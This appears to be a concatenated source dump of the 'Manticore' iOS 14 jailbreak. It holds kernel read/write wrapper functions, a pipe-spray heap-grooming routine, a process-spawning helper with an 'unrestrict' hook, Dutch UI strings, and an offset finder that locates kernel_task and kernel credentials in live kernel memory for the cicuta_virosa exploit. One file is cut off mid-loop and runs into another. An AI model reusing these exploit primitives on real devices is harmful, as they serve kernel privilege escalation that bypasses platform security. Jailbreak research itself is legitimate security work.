2 | // kapi_memory.c
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/22.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 |
12 | mach_port_t kernel_task_port;
13 |
14 | void (^stage0_read)(kptr_t addr, void *data, size_t len);
15 | uint32_t (^stage0_read32)(kptr_t addr);
16 | uint64_t (^stage0_read64)(kptr_t addr);
17 | kptr_t (^stage0_read_kptr)(kptr_t addr);
18 |
19 | void (^stage0_write)(kptr_t addr, void *data, size_t len);
20 | void (^stage0_write64)(kptr_t addr, uint64_t v);
21 |
22 | void kapi_read(kptr_t addr, void *data, size_t len)
23 | {
24 | if (!kernel_task_port) {
25 | return stage0_read(addr, data, len);
26 | }
27 | }
28 |
29 | uint32_t kapi_read32(kptr_t addr)
30 | {
31 | if (!kernel_task_port) {
32 | return stage0_read32(addr);
33 | }
34 | return 0;
35 | }
36 |
37 | uint64_t kapi_read64(kptr_t addr)
38 | {
39 | if (!kernel_task_port) {
40 | return stage0_read64(addr);
41 | }
42 | return 0;
43 | }
44 |
45 | kptr_t kapi_read_kptr(kptr_t addr)
46 | {
47 | if (!kernel_task_port) {
48 | return stage0_read_kptr(addr);
49 | }
50 | return 0;
51 | }
52 |
53 | void kapi_write(kptr_t addr, void *data, size_t len)
54 | {
55 | if (!kernel_task_port) {
56 | return stage0_write(addr, data, len);
57 | }
58 | }
59 |
60 | bool kapi_write32(kptr_t addr, uint32_t value)
61 | {
62 | if (!kernel_task_port) {
63 | stage0_write(addr, &value, sizeof(value));
64 | return true;
65 | }
66 | return false;
67 | }
68 |
69 | bool kapi_write64(kptr_t addr, uint64_t value)
70 | {
71 | if (!kernel_task_port) {
72 | stage0_write64(addr, value);
73 | return true;
74 | }
75 | return false;
76 | }
77 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/sys_darwin.c:
--------------------------------------------------------------------------------
1 | //
2 | // sys_darwin.c
3 | // ios-fuzzer
4 | //
5 | // Created by Quote on 2021/1/26.
6 | // Copyright © 2021 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 |
15 | struct exploit_common_s g_exp;
16 |
17 | void sys_init(void) {
18 | static bool inited = false;
19 | if (inited) {
20 | return;
21 | }
22 | int err;
23 | char buf[256];
24 |
25 | size_t oldlen = sizeof(g_exp.physmemsize);
26 | err = sysctlbyname("hw.memsize", &g_exp.physmemsize, &oldlen, NULL, 0);
27 | assert(err == 0);
28 | oldlen = sizeof(g_exp.pagesize);
29 | err = sysctlbyname("hw.pagesize", &g_exp.pagesize, &oldlen, NULL, 0);
30 | assert(err == 0);
31 |
32 | oldlen = sizeof(buf);
33 | err = sysctlbyname("hw.model", buf, &oldlen, NULL, 0);
34 | assert(err == 0);
35 | g_exp.model = strdup(buf);
36 | oldlen = sizeof(buf);
37 | err = sysctlbyname("kern.osversion", buf, &oldlen, NULL, 0);
38 | assert(err == 0);
39 | g_exp.osversion = strdup(buf);
40 | oldlen = sizeof(buf);
41 | err = sysctlbyname("kern.osproductversion", buf, &oldlen, NULL, 0);
42 | assert(err == 0);
43 | g_exp.osproductversion = strdup(buf);
44 | oldlen = sizeof(buf);
45 | err = sysctlbyname("hw.machine", buf, &oldlen, NULL, 0);
46 | assert(err == 0);
47 | g_exp.machine = strdup(buf);
48 | oldlen = sizeof(buf);
49 | err = sysctlbyname("kern.version", buf, &oldlen, NULL, 0);
50 | assert(err == 0);
51 | g_exp.kern_version = strdup(buf);
52 |
53 | inited = true;
54 | }
55 |
56 | void print_os_details(void)
57 | {
58 | util_info("Machine Name: %s", g_exp.machine);
59 | util_info("Model Name: %s", g_exp.model);
60 | util_info("Kernel Version: %s", g_exp.kern_version);
61 | // util_info("Kernel Page Size: %#llx", g_exp.pagesize);
62 | // util_info("Ram Size: %.1f MB", g_exp.physmemsize / 1024.0 / 1024.0);
63 | util_info("System Version: iOS %s (%s)", g_exp.osproductversion, g_exp.osversion);
64 | }
65 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/user_kernel_alloc.c:
--------------------------------------------------------------------------------
1 | //
2 | // user_kernel_alloc.h
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/30.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 |
19 | // ---------------------------------------------------------------------------
20 | // pipe spray
21 | // ---------------------------------------------------------------------------
22 |
23 | void pipe_close(int pipefds[2]) {
24 | close(pipefds[0]);
25 | close(pipefds[1]);
26 | }
27 |
28 | /*
29 | * set_nonblock
30 | *
31 | * Description:
32 | * Set the O_NONBLOCK flag on the specified file descriptor.
33 | */
34 | static void __unused set_nonblock(int fd) {
35 | int flags = fcntl(fd, F_GETFL);
36 | flags |= O_NONBLOCK;
37 | fcntl(fd, F_SETFL, flags);
38 | }
39 |
40 | int *create_pipes(size_t *pipe_count) {
41 | // Allocate our initial array.
42 | size_t capacity = *pipe_count;
43 | int *pipefds = calloc(2 * capacity, sizeof(int));
44 | assert(pipefds != NULL);
45 | // Create as many pipes as we can.
46 | size_t count = 0;
47 | for (; count < capacity; count++) {
48 | // First create our pipe fds.
49 | int fds[2] = { -1, -1 };
50 | int error = pipe(fds);
51 | // Unfortunately pipe() seems to return success with invalid fds once we've
52 | // exhausted the file limit. Check for this.
53 | if (error != 0 || fds[0] < 0 || fds[1] < 0) {
54 | pipe_close(fds);
55 | break;
56 | }
57 | // Mark the write-end as nonblocking.
58 | //set_nonblock(fds[1]);
59 | // Store the fds.
60 | pipefds[2 * count + 0] = fds[0];
61 | pipefds[2 * count + 1] = fds[1];
62 | }
63 | assert(count == capacity && "can't alloc enough pipe fds");
64 | // Truncate the array to the smaller size.
65 | int *new_pipefds = realloc(pipefds, 2 * count * sizeof(int));
66 | assert(new_pipefds != NULL);
67 | // Return the count and the array.
68 | *pipe_count = count;
69 | return new_pipefds;
70 | }
71 |
72 | void close_pipes(int *pipefds, size_t pipe_count) {
73 | for (size_t i = 0; i < pipe_count; i++) {
74 | pipe_close(pipefds + 2 * i);
75 | }
76 | }
77 |
78 | size_t pipe_spray(const int *pipefds, size_t pipe_count,
79 | void *pipe_buffer, size_t pipe_buffer_size,
80 | void (^update)(uint32_t pipe_index, void *data, size_t size)) {
81 | assert(pipe_count <= 0xffffff);
82 | assert(pipe_buffer_size > 512);
83 | size_t write_size = pipe_buffer_size - 1;
84 | size_t pipes_filled = 0;
85 | for (size_t i = 0; i < pipe_count; i++) {
86 | // Update the buffer.
87 | if (update != NULL) {
88 | update((uint32_t)i, pipe_buffer, pipe_buffer_size);
89 | }
90 | // Fill the write-end of the pipe with the buffer. Leave off the last byte.
91 | int wfd = pipefds[2 * i + 1];
92 | ssize_t written = write(wfd, pipe_buffer, write_size);
93 | if (written != write_size) {
94 | // This is most likely because we've run out of pipe buffer memory. None of
95 | // the subsequent writes will work either.
96 | break;
97 | }
98 | pipes_filled++;
99 | }
100 | return pipes_filled;
101 | }
102 |
--------------------------------------------------------------------------------
/manticore/lib/pattern_f/utils.c:
--------------------------------------------------------------------------------
1 | //
2 | // utils.c
3 | // exploit-1
4 | //
5 | // Created by Quote on 2020/12/24.
6 | // Copyright © 2020 Quote. All rights reserved.
7 | //
8 |
9 | #include
10 | #include
11 | #include
12 | #include
13 | #include
14 | #include
15 | #include
16 | #include
17 | #include
18 | #include
19 | #include
20 | #include
21 |
22 | static void util_vprintf(const char *fmt, va_list ap);
23 |
24 | void util_hexprint(void *data, size_t len, const char *desc)
25 | {
26 | uint8_t *ptr = (uint8_t *)data;
27 | size_t i;
28 |
29 | if (desc) {
30 | util_printf("%s\n", desc);
31 | }
32 | for (i = 0; i < len; i++) {
33 | if (i % 16 == 0) {
34 | util_printf("%04x: ", (uint16_t)i);
35 | }
36 | util_printf("%02x ", ptr[i]);
37 | if (i % 16 == 7) {
38 | util_printf(" ");
39 | }
40 | if (i % 16 == 15) {
41 | util_printf("\n");
42 | }
43 | }
44 | if (i % 16 != 0) {
45 | util_printf("\n");
46 | }
47 | }
48 |
49 | void util_hexprint_width(void *data, size_t len, int width, const char *desc)
50 | {
51 | uint8_t *ptr = (uint8_t *)data;
52 | size_t i;
53 |
54 | if (desc) {
55 | util_printf("%s\n", desc);
56 | }
57 | for (i = 0; i < len; i += width) {
58 | if (i % 16 == 0) {
59 | util_printf("%04x: ", (uint16_t)i);
60 | }
61 | if (width == 8) {
62 | util_printf("%016llx ", *(uint64_t *)(ptr + i));
63 | }
64 | else if (width == 4) {
65 | util_printf("%08x ", *(uint32_t *)(ptr + i));
66 | }
67 | else if (width == 2) {
68 | util_printf("%04x ", *(uint16_t *)(ptr + i));
69 | }
70 | else {
71 | util_printf("%02x ", ptr[i]);
72 | }
73 | if ((i + width) % 16 == 8) {
74 | util_printf(" ");
75 | }
76 | if ((i + width) % 16 == 0) {
77 | util_printf("\n");
78 | }
79 | }
80 | if (i % 16 != 0) {
81 | util_printf("\n");
82 | }
83 | }
84 |
85 | void util_nanosleep(uint64_t nanosecs)
86 | {
87 | int ret;
88 | struct timespec tp;
89 | tp.tv_sec = nanosecs / (1000 * 1000 * 1000);
90 | tp.tv_nsec = nanosecs % (1000 * 1000 * 1000);
91 | do {
92 | ret = nanosleep(&tp, &tp);
93 | } while (ret && errno == EINTR);
94 | }
95 |
96 | void util_msleep(unsigned int ms)
97 | {
98 | uint64_t nanosecs = ms * 1000 * 1000;
99 | util_nanosleep(nanosecs);
100 | }
101 |
102 | _Noreturn static void vfail(const char *fmt, va_list ap)
103 | {
104 | char text[512];
105 | vsnprintf(text, sizeof(text), fmt, ap);
106 | util_printf("[!] fail < %s >\n", text);
107 | util_printf("[*] endless loop\n");
108 | while (1) {
109 | util_msleep(1000);
110 | }
111 | }
112 |
113 | void fail_if(bool cond, const char *fmt, ...)
114 | {
115 | if (cond) {
116 | va_list ap;
117 | va_start(ap, fmt);
118 | vfail(fmt, ap);
119 | va_end(ap);
120 | }
121 | }
122 |
123 | _Noreturn void fail_info(const char *info)
124 | {
125 | util_printf("[!] fail < %s >\n", info ? info : "null");
126 | util_printf("[*] endless loop\n");
127 | while (1) {
128 | util_msleep(1000);
129 | }
130 | }
131 |
132 | void (*log_UI)(const char *text) = NULL;
133 |
134 | static void log_vprintf(int type, const char *fmt, va_list ap)
135 | {
136 | char message[256];
137 |
138 | vsnprintf(message, sizeof(message), fmt, ap);
139 | switch (type) {
140 | case 'D': type = 'D'; break;
141 | case 'I': type = '+'; break;
142 | case 'W': type = '!'; break;
143 | case 'E': type = '-'; break;
144 | }
145 | fprintf(stdout, "[%c] %s\n", type, message);
146 | if (0) {
147 | CF_EXPORT void CFLog(int32_t level, CFStringRef format, ...);
148 | CFLog(6, CFSTR("[%c] %s\n"), type, message);
149 | }
150 | if (log_UI) {
151 | char ui_text[512];
152 | snprintf(ui_text, sizeof(ui_text), "[%c] %s\n", type, message);
153 | log_UI(ui_text);
154 | }
155 | }
156 |
157 | void util_debug(const char *fmt, ...)
158 | {
159 | va_list ap;
160 | va_start(ap, fmt);
161 | log_vprintf('D', fmt, ap);
162 | va_end(ap);
163 | }
164 |
165 | void util_info(const char *fmt, ...)
166 | {
167 | va_list ap;
168 | va_start(ap, fmt);
169 | log_vprintf('I', fmt, ap);
170 | va_end(ap);
171 | }
172 |
173 | void util_warning(const char *fmt, ...)
174 | {
175 | va_list ap;
176 | va_start(ap, fmt);
177 | log_vprintf('W', fmt, ap);
178 | va_end(ap);
179 | }
180 |
181 | void util_error(const char *fmt, ...)
182 | {
183 | va_list ap;
184 | va_start(ap, fmt);
185 | log_vprintf('E', fmt, ap);
186 | va_end(ap);
187 | }
188 |
189 | static void util_vprintf(const char *fmt, va_list ap)
190 | {
191 | vfprintf(stdout, fmt, ap);
192 | if (log_UI) {
193 | char ui_text[512];
194 | vsnprintf(ui_text, sizeof(ui_text), fmt, ap);
195 | log_UI(ui_text);
196 | }
197 | }
198 |
199 | void util_printf(const char *fmt, ...)
200 | {
201 | va_list ap;
202 | va_start(ap, fmt);
203 | util_vprintf(fmt, ap);
204 | va_end(ap);
205 | }
206 |
207 | extern char **environ;
208 |
209 | static int runCommandv(const char *cmd, int argc, const char * const* argv, void (^unrestrict)(pid_t))
210 | {
211 | pid_t pid;
212 | posix_spawn_file_actions_t *actions = NULL;
213 | posix_spawn_file_actions_t actionsStruct;
214 | int out_pipe[2];
215 | bool valid_pipe = false;
216 | posix_spawnattr_t *attr = NULL;
217 | posix_spawnattr_t attrStruct;
218 |
219 | valid_pipe = pipe(out_pipe) == 0;
220 | if (valid_pipe && posix_spawn_file_actions_init(&actionsStruct) == 0) {
221 | actions = &actionsStruct;
222 | posix_spawn_file_actions_adddup2(actions, out_pipe[1], 1);
223 | posix_spawn_file_actions_adddup2(actions, out_pipe[1], 2);
224 | posix_spawn_file_actions_addclose(actions, out_pipe[0]);
225 | posix_spawn_file_actions_addclose(actions, out_pipe[1]);
226 | }
227 |
228 | if (unrestrict && posix_spawnattr_init(&attrStruct) == 0) {
229 | attr = &attrStruct;
230 | posix_spawnattr_setflags(attr, POSIX_SPAWN_START_SUSPENDED);
231 | }
232 |
233 | int rv = posix_spawn(&pid, cmd, actions, attr, (char *const *)argv, environ);
234 |
235 | if (unrestrict) {
236 | unrestrict(pid);
237 | kill(pid, SIGCONT);
238 | }
239 |
240 | if (valid_pipe) {
241 | close(out_pipe[1]);
242 | }
243 |
244 | if (rv == 0) {
245 | if (valid_pipe) {
246 | char buf[256];
247 | ssize_t len;
248 | while (1) {
249 | len = read(out_pipe[0], buf, sizeof(buf) - 1);
250 | if (len == 0) {
251 | break;
252 | }
253 | else if (len == -1) {
254 | perror("posix_spawn, read pipe");
255 | }
256 | buf[len] = 0;
257 | util_printf("%s", buf);
258 | }
259 | }
260 | if (waitpid(pid, &rv, 0) == -1) {
261 | util_error("ERROR: Waitpid failed");
262 | } else {
263 | util_info("%s(%d) completed with exit status %d", __FUNCTION__, pid, WEXITSTATUS(rv));
264 | }
265 |
266 | } else {
267 | util_error("%s(%d): ERROR posix_spawn failed (%d): %s", __FUNCTION__, pid, rv, strerror(rv));
268 | rv <<= 8; // Put error into WEXITSTATUS
269 | }
270 | if (valid_pipe) {
271 | close(out_pipe[0]);
272 | }
273 | return rv;
274 | }
275 |
276 | int util_runCommand(const char *cmd, ...)
277 | {
278 | va_list ap, ap2;
279 | int argc = 1;
280 |
281 | va_start(ap, cmd);
282 | va_copy(ap2, ap);
283 |
284 | while (va_arg(ap, const char *) != NULL) {
285 | argc++;
286 | }
287 | va_end(ap);
288 |
289 | const char *argv[argc+1];
290 | argv[0] = cmd;
291 | for (int i=1; i
9 | #import "AppDelegate.h"
10 |
11 | int main(int argc, char * argv[]) {
12 | @autoreleasepool {
13 | return UIApplicationMain(argc, argv, nil, NSStringFromClass([AppDelegate class]));
14 | }
15 | }
16 |
--------------------------------------------------------------------------------
/manticore/manticore.entitlements:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | get-task-allow
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/manticore/nl.proj/LaunchScreen.strings:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/manticore/nl.proj/Main.strings:
--------------------------------------------------------------------------------
1 | /* Class = "UILabel"; text = "Set APNonce"; ObjectID = "0yi-4F-L8u"; */
2 | "0yi-4F-L8u.text" = "Zet APNonce";
3 |
4 | /* Class = "UILabel"; text = "Enable Tweaks"; ObjectID = "2Nf-dY-FJy"; */
5 | "2Nf-dY-FJy.text" = "Tweaks Aanzetten";
6 |
7 | /* Class = "UILabel"; text = "Disable Screen Time"; ObjectID = "8Oy-13-2xy"; */
8 | "8Oy-13-2xy.text" = "Schakel Scherm Tijd uit";
9 |
10 | /* Class = "UILabel"; text = "Package Management"; ObjectID = "8lS-uL-LxK"; */
11 | "8lS-uL-LxK.text" = "Package Management";
12 |
13 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "AVZ-qX-0ms"; */
14 | "AVZ-qX-0ms.text" = "Herstel RootFS";
15 |
16 | /* Class = "UIButton"; normalTitle = "Jailbreak"; ObjectID = "B09-wX-UeI"; */
17 | "B09-wX-UeI.normalTitle" = "Jailbreak";
18 |
19 | /* Class = "UILabel"; text = "Show Log Window"; ObjectID = "GyA-VR-ZRI"; */
20 | "GyA-VR-ZRI.text" = "Laat Log Window Zien";
21 |
22 | /* Class = "UITextField"; placeholder = "0x1111111111111111"; ObjectID = "JaD-0s-nbo"; */
23 | "JaD-0s-nbo.placeholder" = "0x1111111111111111";
24 |
25 | /* Class = "UILabel"; text = "Disable Updates"; ObjectID = "K4g-i5-DXs"; */
26 | "K4g-i5-DXs.text" = "Updates Blokkeren";
27 |
28 | /* Class = "UILabel"; text = "Settings"; ObjectID = "KVP-vA-4W2"; */
29 | "KVP-vA-4W2.text" = "Instellingen";
30 |
31 | /* Class = "UIButton"; normalTitle = "Save & Set APNonce"; ObjectID = "WEh-zy-xS5"; */
32 | "WEh-zy-xS5.normalTitle" = "APNonce Opslaan & Zetten";
33 |
34 | /* Class = "UILabel"; text = "Restore RootFS"; ObjectID = "bFz-pN-VmJ"; */
35 | "bFz-pN-VmJ.text" = "Herstel RootFS";
36 |
37 | /* Class = "UIButton"; normalTitle = "Options"; ObjectID = "czz-vo-cHF"; */
38 | "czz-vo-cHF.normalTitle" = "Instellingen";
39 |
40 | /* Class = "UILabel"; text = "Block OTA Updates"; ObjectID = "efL-nQ-xsh"; */
41 | "efL-nQ-xsh.text" = "OTA Updates Blokkeren";
42 |
43 | /* Class = "UILabel"; text = "Max Memory Limit"; ObjectID = "hav-yD-P83"; */
44 | "hav-yD-P83.text" = "Max Geheugen Limiet";
45 |
46 | /* Class = "UILabel"; text = "Compatibility"; ObjectID = "i1H-yX-3n8"; */
47 | "i1H-yX-3n8.text" = "Compatibiliteit";
48 |
49 | /* Class = "UILabel"; text = "Load Daemons"; ObjectID = "kFD-2g-aOl"; */
50 | "kFD-2g-aOl.text" = "Laad Daemons";
51 |
52 | /* Class = "UILabel"; text = "Remove ScreenTime"; ObjectID = "kyq-MK-M3C"; */
53 | "kyq-MK-M3C.text" = "Verwijder Schermtijd";
54 |
55 | /* Class = "UILabel"; text = "Manticore"; ObjectID = "mUJ-nK-XHv"; */
56 | "mUJ-nK-XHv.text" = "Manticore";
57 |
58 | /* Class = "UILabel"; text = "Load Tweaks"; ObjectID = "ntj-8w-lbe"; */
59 | "ntj-8w-lbe.text" = "Laad Tweaks";
60 |
61 | /* Class = "UILabel"; text = "Your iPhone 11 Pro on iOS 14.3 is compatible with Manticore!"; ObjectID = "o5h-H3-igh"; */
62 | "o5h-H3-igh.text" = "Je iPhone 11 Pro op iOS 14.3 is compatible met Manticore!";
63 |
64 | /* Class = "UITextView"; text = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda."; ObjectID = "oZg-Pf-ew7"; */
65 | "oZg-Pf-ew7.text" = "Lorem ipsum dolor sit er elit lamet, consectetaur cillium adipisicing pecu, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum. Nam liber te conscient to factor tum poen legum odioque civiuda.";
66 |
67 | /* Class = "UILabel"; text = "Log ECID"; ObjectID = "voS-Ev-D3K"; */
68 | "voS-Ev-D3K.text" = "Log ECID";
69 |
70 | /* Class = "UILabel"; text = "iOS 14.0 - 14.3"; ObjectID = "xtR-ck-MtY"; */
71 | "xtR-ck-MtY.text" = "iOS 14.0 - 14.3";
72 |
73 | /* Class = "UILabel"; text = "Toggle Log Window"; ObjectID = "yiE-wg-tPU"; */
74 | "yiE-wg-tPU.text" = "Toggle Log Window";
75 |
--------------------------------------------------------------------------------
/manticore/offset_finder/offset_finder.mm:
--------------------------------------------------------------------------------
1 | /*
2 | kernel_task offset finder for cicuta_virosa, untested
3 | (c) fugiefire 01/03/2021
4 | */
5 |
6 | #include
7 | #include
8 | #include
9 | #include
10 | #include
11 | #include
12 | #include "k_offsets.h"
13 | #include "log.hpp"
14 | #include "../include/lib/tq/kapi.h"
15 |
16 | /* define this to 0 when reading from live mem, 1 when testing on a decompressed kcache */
17 | #define TESTENV 0
18 | #define KBASE 0xFFFFFFF007004000
19 | #define KSIZE 0x0000000003000000
20 |
21 | typedef uint64_t kptr_t;
22 |
23 | #if TESTENV
24 | void kapi_read(kptr_t addr, void *data, size_t len) { memcpy(data, (void*)addr, len); }
25 | uint32_t kapi_read32(kptr_t addr) { return *(uint32_t *)addr; }
26 | uint64_t kapi_read64(kptr_t addr) { return *(uint64_t *)addr; }
27 | #else
28 | extern void kapi_read(kptr_t addr, void *data, size_t len);
29 | extern uint32_t kapi_read32(kptr_t addr);
30 | extern uint64_t kapi_read64(kptr_t addr);
31 | #endif
32 |
33 | /* wrappers for future proofing */
34 | void _kread(void *p, char *r, size_t n) { return kapi_read((kptr_t)p, (void *)r, n); }
35 | uint32_t _kread_32(void *p) { return kapi_read32((kptr_t)p); }
36 | uint64_t _kread_64(void *p) { return kapi_read64((kptr_t)p); }
37 |
38 | /****** BMH ALGORITHM ******/
39 | /* https://en.wikipedia.org/wiki/Boyer%E2%80%93Moore%E2%80%93Horspool_algorithm */
40 |
41 | void _bmh_table_gen(unsigned char const *needle, const size_t needle_len,
42 | size_t table[]) {
43 | for (int i = 0; i <= UCHAR_MAX; i++)
44 | table[i] = needle_len;
45 | for (int i = 0; i < needle_len - 1; i++)
46 | table[needle[i]] = needle_len - 1 - i;
47 | }
48 |
49 | void *bmh_search(unsigned char const *needle, const size_t needle_len,
50 | unsigned char *haystack, size_t haystack_len) {
51 | size_t table[UCHAR_MAX + 1] = {0};
52 | _bmh_table_gen(needle, needle_len, table);
53 |
54 | while (haystack_len >= needle_len) {
55 | for (size_t i = needle_len - 1; haystack[i] == needle[i]; i--)
56 | if (i == 0) return (void *)haystack;
57 |
58 | haystack_len -= table[haystack[needle_len - 1]];
59 | haystack += table[haystack[needle_len - 1]];
60 |
61 | fflush(stdout);
62 | }
63 |
64 | return NULL;
65 | }
66 |
67 | /****** aarch64 fuckery ******/
68 | typedef uint32_t aarch64_insn_t;
69 | typedef uint64_t u64;
70 | typedef uint32_t u32;
71 |
72 | enum aarch64_reg {
73 | X0, X1, X2, X3, X4, X5, X7, X8, X9,
74 | X10, X11, X12, X13, X14, X15, X16,
75 | X17, X18, X19, X20, X21, X22, X23,
76 | X24, X25, X26, X27, X28, X29, X30,
77 | X31
78 | };
79 |
80 | enum aarch64_insn_type {
81 | UNK = 0, ADRP = 1, ADD
82 | };
83 |
84 | /* starting to regret not using capstone */
85 | enum aarch64_insn_type get_insn_type(aarch64_insn_t insn) {
86 | if ((insn & 0x9F000000) == 0x90000000) return ADRP;
87 | else if ((insn & 0xFF000000) == 0x91000000) return ADD;
88 | else return UNK;
89 | }
90 |
91 | long long _extract_adrp_imm(u64 off, aarch64_insn_t insn, int print) {
92 | /* extract immhi:immlo from adrp */
93 | u32 immhi = insn & 0xFFFFE0;
94 | immhi <<= 8;
95 |
96 | u32 immlo = insn & 0x60000000;
97 | immlo >>= 18;
98 |
99 | long long imm = immhi | immlo;
100 | imm <<= 1;
101 |
102 | /* sign extend */
103 | /* this is very shit */
104 | if (imm & 0x100000000) imm += 0xFFFFFFFE00000000;
105 |
106 | /* add pc relative */
107 | imm += (off & ~0xFFF);
108 |
109 | return imm;
110 | }
111 |
112 | u32 _extract_add_imm(aarch64_insn_t insn) {
113 | u32 imm = insn & 0x3FFC00;
114 | imm >>= 10;
115 | switch ((insn >> 22) & 0b11) { // check if shift is set
116 | case 0b00:
117 | break;
118 | case 0b01:
119 | imm <<= 12;
120 | case 0b10: /* this means the insn is addg, so get_insn_type didn't work properly */
121 | case 0b11:
122 | default:
123 | /* throw? */
124 | break;
125 | }
126 | return imm;
127 | }
128 |
129 | void *find_xref_to(void *ref, void *haystack, void *from, void *to) {
130 | /* insn align */
131 | from = (void *)((u64)from & ~3);
132 | to = (void *)((u64)to & ~3);
133 |
134 | aarch64_insn_t cur_insn;
135 | while (from < to) {
136 | cur_insn = _kread_32((void *)((u64)haystack + (u64)from));
137 | switch (get_insn_type(cur_insn)) {
138 | case ADRP: {
139 | u64 imm = _extract_adrp_imm((u64)haystack + (u64)from, cur_insn, 0);
140 |
141 | /* ADRP could directly xref our ref if it's page aligned */
142 | if (imm == (u64) ref)
143 | return (void *)((u64)haystack + (u64)from);
144 |
145 | /* check if the next insn is an ADD */
146 | cur_insn = _kread_32((void *)((u64)haystack + (u64)from + 4));
147 | if (get_insn_type(cur_insn) != ADD)
148 | break;
149 |
150 | imm |= _extract_add_imm(cur_insn);
151 |
152 | if (imm == (u64)ref)
153 | return (void *)((u64)haystack + (u64)from);
154 |
155 | break;
156 |
157 | }
158 | default:
159 | break;
160 | }
161 |
162 | /* next insn */
163 | from = (void *)((u64)from + 4);
164 | }
165 |
166 | return NULL;
167 | }
168 |
169 |
170 | /** kernel_cred / kernel_vm_map finder **/
171 |
172 | kptr_t get_kernel_cred_addr(kptr_t kernel_proc){
173 | kptr_t ret = KPTR_NULL;
174 | kptr_t kernel_proc_struct_addr = kernel_proc;
175 | if(KERN_POINTER_VALID(kernel_proc_struct_addr)){
176 | kptr_t kernel_ucred_struct_addr = kapi_read_kptr(kernel_proc_struct_addr + OFFSET(proc, p_ucred));
177 | if(KERN_POINTER_VALID(kernel_ucred_struct_addr)){
178 | ret = kernel_ucred_struct_addr;
179 | } else manticore_warn("Invalid kernel_ucred_struct_addr.\t\t(0x%llx)\n", kernel_ucred_struct_addr);
180 | } else manticore_warn("Invalid kernel_proc_struct_addr.\t\t(0x%llx)\n", kernel_proc_struct_addr);
181 | return ret;
182 | }
183 |
184 | kptr_t get_kernel_vm_map(kptr_t kernel_task){
185 | kptr_t ret = kapi_read_kptr(kernel_task + 0x28);;
186 | if(!KERN_POINTER_VALID(ret)) manticore_warn("Pointer invalid; kernel_vm_map!\t\t(0x%llx)\n", (kernel_task + 0x28));
187 | return ret;
188 | }
189 |
190 |
191 | /****** kernel_task finder ******/
192 |
193 | // string to match
194 | static const unsigned char *_IOGPUResource = (unsigned char *)"static IOGPUResource *IOGPUResource::newResourceWithOptions(IOGPU *, IOGPUDevice *, enum eIOGPUResType, uint64_t, IOByteCount, IOOptionBits, mach_vm_address_t *, IOGPUNewResourceArgs *)";
195 | // address of ^
196 | kptr_t p_IOGPUResource = 0;
197 |
198 | kptr_t p_kernel_base = KBASE;
199 | size_t v_kernel_size = KSIZE; // this is almost guaranteed to go beyond end of kernel
200 |
201 |
202 |
203 | kptr_t find_kernel_task(void *kbase, size_t ksize) {
204 | // p_kernel_base should be fine, but i'm not 100% sure
205 | if (!kbase) kbase = (void *)p_kernel_base;
206 | if (!ksize) ksize = v_kernel_size;
207 |
208 | static const unsigned char prologue_iogpuresource[] = {
209 | 0xE6, 0x03, 0x05, 0xAA, /* MOV X6, X5 */
210 | 0xE5, 0x03, 0x04, 0xAA, /* MOV X5, X4 */
211 | 0xE4, 0x03, 0x03, 0xAA, /* MOV X4, X3 */
212 | 0x03, 0x00, 0x80, 0xD2, /* MOV X3, #0 */
213 | 0x07, 0x00, 0x80, 0xD2, /* MOV X7, #0 */
214 | };
215 |
216 | p_IOGPUResource = (kptr_t) bmh_search(
217 | _IOGPUResource, strlen((const char *)_IOGPUResource),
218 | (unsigned char *)kbase, ksize);
219 |
220 | #if TESTENV
221 | p_IOGPUResource -= (kptr_t) kbase;
222 | p_IOGPUResource += p_kernel_base;
223 | #endif
224 |
225 | /* IOGPUResource::newResourceWithOptions */
226 | /* that same function has kernel_task at +D0 */
227 | kptr_t func_iogpuresource = (kptr_t)find_xref_to((void *)p_IOGPUResource, kbase, 0, (void *)ksize);
228 | /* backtrack to function prologue */
229 | func_iogpuresource = (kptr_t) bmh_search(
230 | prologue_iogpuresource, sizeof(prologue_iogpuresource),
231 | (unsigned char *)(func_iogpuresource - 0xF0), 0x500); /* 0x500 is way overshooting it as is */
232 |
233 | /* extract kernel_task from:
234 | * ADRP X8, #_kernel_task@PAGE
235 | * ADD X8, X8, #_kernel_task@PAGEOFF */
236 | aarch64_insn_t adrp_ktask = *((aarch64_insn_t *) (func_iogpuresource + 0xD0));
237 | aarch64_insn_t add_ktask = *((aarch64_insn_t *) (func_iogpuresource + 0xD4));
238 | #if TESTENV
239 | printf("adrp_ktask: %p\nadd_ktask: %p\n", (void *)((size_t)adrp_ktask), (void *)((size_t)add_ktask));
240 | #endif
241 |
242 | kptr_t kernel_task = _extract_adrp_imm(func_iogpuresource + 0xD0, adrp_ktask, 1) | _extract_add_imm(add_ktask);
243 | return kernel_task;
244 | }
245 |
246 | void init_offset_finder(kptr_t kernel_base) {
247 | /* calculate kbase */
248 | kptr_t start = kernel_base;
249 | unsigned char macho_header[] = {
250 | 0xCF, 0xFA, 0xED, 0xFE, /* 0xFEEDFACF */
251 | 0x0C, 0x00, 0x00, 0x01, /* 0x0100000C */
